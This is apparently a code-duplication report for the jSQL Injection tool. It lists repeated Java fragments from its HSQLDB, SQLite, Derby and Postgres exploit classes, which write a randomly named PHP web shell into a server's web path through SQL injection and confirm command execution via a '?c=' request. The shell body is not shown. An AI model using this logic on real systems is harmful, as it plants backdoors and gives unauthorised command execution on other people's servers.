this.injectionModel.getMediatorUtils().propertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getFile().getWrite(),
nameTable,
nameTable, bodyExploit.replace("'", "''"),
nameTable,
pathExploit + nameExploit
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitHsqldb.java | model | 49 |
| com/jsql/model/accessible/engine/ExploitHsqldb.java | model | 80 |
this.injectionModel.getMediatorUtils().propertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getFile().getWrite(),
nameTable,
nameTable, bodyExploit.replace("'", "\""),
nameTable, pathExploit + nameExploit
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitSqlite.java | model | 79 |
| com/jsql/model/accessible/engine/ExploitSqlite.java | model | 110 |
this.injectionModel.getMediatorUtils().propertiesUtil().getProperty("exploit.web")
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameDbRandom = RandomStringUtils.secure().nextAlphabetic(8);
var nameTableRandom = RandomStringUtils.secure().nextAlphabetic(8);
var nameExploit = nameDbRandom + nameTableRandom +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getWriteFile(),
pathExploit + nameExploit, nameDbRandom,
nameDbRandom, nameTableRandom,
nameDbRandom, nameTableRandom, bodyExploit
), ResourceAccess.TBL_DUMP);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitDerby.java | model | 61 |
| com/jsql/model/accessible/engine/ExploitPostgres.java | model | 422 |
| com/jsql/model/accessible/engine/ExploitSqlite.java | model | 91 |
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
String result = this.injectionModel.getResourceAccess().callCommand(
urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
);
if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
return StringUtils.EMPTY;
}
this.injectionModel.sendToViews(new Seal.AddTabExploitWeb(urlSuccess));
return urlSuccess;
};
return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
|
||